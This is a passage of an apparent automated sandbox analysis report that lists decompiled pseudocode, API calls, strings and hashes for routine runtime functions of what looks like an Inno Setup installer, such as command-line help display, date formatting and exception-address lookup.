				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                                                                                            0x004afa44
                                                                                                                            0x004afa44
                                                                                                                            0x004afa47
                                                                                                                            0x004afa49
                                                                                                                            0x004afa4c
                                                                                                                            0x004afa50
                                                                                                                            0x004afa51
                                                                                                                            0x004afa56
                                                                                                                            0x004afa59
                                                                                                                            0x004afa63
                                                                                                                            0x004afa77
                                                                                                                            0x004afa65
                                                                                                                            0x004afa6d
                                                                                                                            0x004afa6d
                                                                                                                            0x004afa7c
                                                                                                                            0x004afa81
                                                                                                                            0x004afa84
                                                                                                                            0x004afa85
                                                                                                                            0x004afa8a
                                                                                                                            0x004afa97
                                                                                                                            0x004afaae
                                                                                                                            0x004afab5
                                                                                                                            0x004afab8
                                                                                                                            0x004afabb
                                                                                                                            0x004afacd

                                                                                                                            APIs
                                                                                                                            • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                                                            Strings
                                                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                                                                            • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                                                                            • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                                                                            • Setup, xrefs: 004AFA9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                                                                            • API String ID: 2030045667-3391638011
                                                                                                                            • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                                                            • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                                                                            • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                                                            • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042F9B8 Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                                                                            0x0042f9b8
                                                                                                                            0x0042f9b8
                                                                                                                            0x0042f9b9
                                                                                                                            0x0042f9bb
                                                                                                                            0x0042f9bf
                                                                                                                            0x0042f9c2
                                                                                                                            0x0042f9c5
                                                                                                                            0x0042f9c8
                                                                                                                            0x0042f9cf
                                                                                                                            0x0042f9dc
                                                                                                                            0x0042fb6d
                                                                                                                            0x0042fb73
                                                                                                                            0x0042fb8a
                                                                                                                            0x0042fbac
                                                                                                                            0x0042fbbb
                                                                                                                            0x0042fbc7
                                                                                                                            0x0042fbce
                                                                                                                            0x0042fc88
                                                                                                                            0x0042fc95
                                                                                                                            0x0042fd0a
                                                                                                                            0x0042fd19
                                                                                                                            0x0042fd25
                                                                                                                            0x0042fd2c
                                                                                                                            0x0042fde0
                                                                                                                            0x00000000
                                                                                                                            0x0042fd32
                                                                                                                            0x0042fd3c
                                                                                                                            0x0042fdd6
                                                                                                                            0x0042fddb
                                                                                                                            0x00000000
                                                                                                                            0x0042fd3e
                                                                                                                            0x0042fd41
                                                                                                                            0x0042fd42
                                                                                                                            0x0042fd49
                                                                                                                            0x0042fd4a
                                                                                                                            0x0042fd4f
                                                                                                                            0x0042fd52
                                                                                                                            0x0042fd55
                                                                                                                            0x0042fd5f
                                                                                                                            0x0042fd6c
                                                                                                                            0x0042fd6e
                                                                                                                            0x0042fd6e
                                                                                                                            0x0042fd92
                                                                                                                            0x0042fd97
                                                                                                                            0x0042fd9c
                                                                                                                            0x0042fd9f
                                                                                                                            0x0042fda2
                                                                                                                            0x0042fdaf
                                                                                                                            0x0042fdaf
                                                                                                                            0x0042fd3c
                                                                                                                            0x0042fd0c
                                                                                                                            0x0042fd0c
                                                                                                                            0x00000000
                                                                                                                            0x0042fd0c
                                                                                                                            0x0042fc97
                                                                                                                            0x0042fc9a
                                                                                                                            0x0042fc9b
                                                                                                                            0x0042fca2
                                                                                                                            0x0042fca3
                                                                                                                            0x0042fca8
                                                                                                                            0x0042fcab
                                                                                                                            0x0042fcb1
                                                                                                                            0x0042fcba
                                                                                                                            0x0042fcc9
                                                                                                                            0x0042fccb
                                                                                                                            0x0042fccb
                                                                                                                            0x0042fcde
                                                                                                                            0x0042fce3
                                                                                                                            0x0042fce6
                                                                                                                            0x0042fce9
                                                                                                                            0x0042fcf6
                                                                                                                            0x0042fcf6
                                                                                                                            0x0042fbd4
                                                                                                                            0x0042fbde
                                                                                                                            0x0042fc78
                                                                                                                            0x0042fc7d
                                                                                                                            0x00000000
                                                                                                                            0x0042fbe0
                                                                                                                            0x0042fbe3
                                                                                                                            0x0042fbe4
                                                                                                                            0x0042fbeb
                                                                                                                            0x0042fbec
                                                                                                                            0x0042fbf1
                                                                                                                            0x0042fbf4
                                                                                                                            0x0042fbf7
                                                                                                                            0x0042fc01
                                                                                                                            0x0042fc0e
                                                                                                                            0x0042fc10
                                                                                                                            0x0042fc10
                                                                                                                            0x0042fc34
                                                                                                                            0x0042fc39
                                                                                                                            0x0042fc3e
                                                                                                                            0x0042fc41
                                                                                                                            0x0042fc44
                                                                                                                            0x0042fc51
                                                                                                                            0x0042fc51
                                                                                                                            0x0042fbde
                                                                                                                            0x0042fbae
                                                                                                                            0x0042fbae
                                                                                                                            0x00000000
                                                                                                                            0x0042fbae
                                                                                                                            0x0042fb8c
                                                                                                                            0x0042fb98
                                                                                                                            0x00000000
                                                                                                                            0x0042fb98
                                                                                                                            0x0042fb75
                                                                                                                            0x0042fb7e
                                                                                                                            0x00000000
                                                                                                                            0x0042fb7e
                                                                                                                            0x0042f9e2
                                                                                                                            0x0042f9e5
                                                                                                                            0x0042f9fc
                                                                                                                            0x0042fa22
                                                                                                                            0x0042fa31
                                                                                                                            0x0042fa3d
                                                                                                                            0x0042fa44
                                                                                                                            0x0042fb02
                                                                                                                            0x0042fb03
                                                                                                                            0x0042fb0a
                                                                                                                            0x0042fb0b
                                                                                                                            0x0042fb10
                                                                                                                            0x0042fb13
                                                                                                                            0x0042fb19
                                                                                                                            0x0042fb22
                                                                                                                            0x0042fb35
                                                                                                                            0x0042fb37
                                                                                                                            0x0042fb37
                                                                                                                            0x0042fb4a
                                                                                                                            0x0042fb4f
                                                                                                                            0x0042fb52
                                                                                                                            0x0042fb55
                                                                                                                            0x0042fb62
                                                                                                                            0x0042fa4a
                                                                                                                            0x0042fa54
                                                                                                                            0x0042faf2
                                                                                                                            0x0042faf7
                                                                                                                            0x00000000
                                                                                                                            0x0042fa56
                                                                                                                            0x0042fa59
                                                                                                                            0x0042fa5a
                                                                                                                            0x0042fa61
                                                                                                                            0x0042fa62
                                                                                                                            0x0042fa67
                                                                                                                            0x0042fa6a
                                                                                                                            0x0042fa6d
                                                                                                                            0x0042fa77
                                                                                                                            0x0042fa88
                                                                                                                            0x0042fa8a
                                                                                                                            0x0042fa8a
                                                                                                                            0x0042faae
                                                                                                                            0x0042fab3
                                                                                                                            0x0042fab8
                                                                                                                            0x0042fabb
                                                                                                                            0x0042fabe
                                                                                                                            0x0042facb
                                                                                                                            0x0042facb
                                                                                                                            0x0042fa54
                                                                                                                            0x0042fa24
                                                                                                                            0x0042fa24
                                                                                                                            0x00000000
                                                                                                                            0x0042fa24
                                                                                                                            0x0042f9fe
                                                                                                                            0x0042fa0a
                                                                                                                            0x00000000
                                                                                                                            0x0042fa0a
                                                                                                                            0x0042f9e7
                                                                                                                            0x0042f9f0
                                                                                                                            0x0042fde5
                                                                                                                            0x0042fded
                                                                                                                            0x0042fded
                                                                                                                            0x0042f9e5

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                                                            • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                                                                            • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                                                            • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041C790 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                                                                                            0x0041c79d
                                                                                                                            0x0041c7a0
                                                                                                                            0x0041c7a2
                                                                                                                            0x0041c7a6
                                                                                                                            0x0041c7a7
                                                                                                                            0x0041c7ac
                                                                                                                            0x0041c7af
                                                                                                                            0x0041c7b4
                                                                                                                            0x0041c7c0
                                                                                                                            0x0041c7cb
                                                                                                                            0x0041c7d6
                                                                                                                            0x0041c7dd
                                                                                                                            0x0041c7f6
                                                                                                                            0x0041c7df
                                                                                                                            0x0041c7e7
                                                                                                                            0x0041c7e7
                                                                                                                            0x0041c80a
                                                                                                                            0x0041c823
                                                                                                                            0x0041c832
                                                                                                                            0x0041c838
                                                                                                                            0x0041c842
                                                                                                                            0x0041c846
                                                                                                                            0x0041c84b
                                                                                                                            0x0041c84b
                                                                                                                            0x0041c858
                                                                                                                            0x0041c858
                                                                                                                            0x0041c838
                                                                                                                            0x0041c85f
                                                                                                                            0x0041c862
                                                                                                                            0x0041c865
                                                                                                                            0x0041c872

                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                            • String ID: $yyyy
                                                                                                                            • API String ID: 3303714858-404527807
                                                                                                                            • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                                                            • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                                                                            • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                                                            • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041EEFC Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                                                                                            0x0041ef0a
                                                                                                                            0x0041ef10
                                                                                                                            0x0041ef13
                                                                                                                            0x0041ef15
                                                                                                                            0x0041ef19
                                                                                                                            0x0041ef1a
                                                                                                                            0x0041ef1f
                                                                                                                            0x0041ef22
                                                                                                                            0x0041ef2f
                                                                                                                            0x0041ef3e
                                                                                                                            0x0041ef6e
                                                                                                                            0x0041ef7a
                                                                                                                            0x0041ef7f
                                                                                                                            0x0041ef85
                                                                                                                            0x0041ef85
                                                                                                                            0x0041efa7
                                                                                                                            0x0041efac
                                                                                                                            0x0041efb1
                                                                                                                            0x0041efb8
                                                                                                                            0x0041efc5
                                                                                                                            0x0041efcf
                                                                                                                            0x0041efd3
                                                                                                                            0x0041efda
                                                                                                                            0x0041efe4
                                                                                                                            0x0041efe4
                                                                                                                            0x0041efda
                                                                                                                            0x0041eff5
                                                                                                                            0x0041effa
                                                                                                                            0x0041f009
                                                                                                                            0x0041f016
                                                                                                                            0x0041f021
                                                                                                                            0x0041f027
                                                                                                                            0x0041f034
                                                                                                                            0x0041f03a
                                                                                                                            0x0041f044
                                                                                                                            0x0041f04a
                                                                                                                            0x0041f051
                                                                                                                            0x0041f057
                                                                                                                            0x0041f05e
                                                                                                                            0x0041f064
                                                                                                                            0x0041f080
                                                                                                                            0x0041f088
                                                                                                                            0x0041f091
                                                                                                                            0x0041f094
                                                                                                                            0x0041f097
                                                                                                                            0x0041f0a7

                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                                                            • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3990497365-0
                                                                                                                            • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                                                            • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                                                                            • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                                                            • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A6C8 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                                                                                            0x0040a6d0
                                                                                                                            0x0040a6d2
                                                                                                                            0x0040a6d6
                                                                                                                            0x0040a6e2
                                                                                                                            0x0040a6ec
                                                                                                                            0x0040a6ef
                                                                                                                            0x0040a6f1
                                                                                                                            0x0040a6f8
                                                                                                                            0x0040a6fb
                                                                                                                            0x0040a70c
                                                                                                                            0x0040a712
                                                                                                                            0x0040a715
                                                                                                                            0x0040a718
                                                                                                                            0x0040a71b
                                                                                                                            0x0040a721
                                                                                                                            0x0040a727
                                                                                                                            0x0040a737
                                                                                                                            0x0040a737
                                                                                                                            0x0040a740
                                                                                                                            0x0040a745
                                                                                                                            0x0040a749
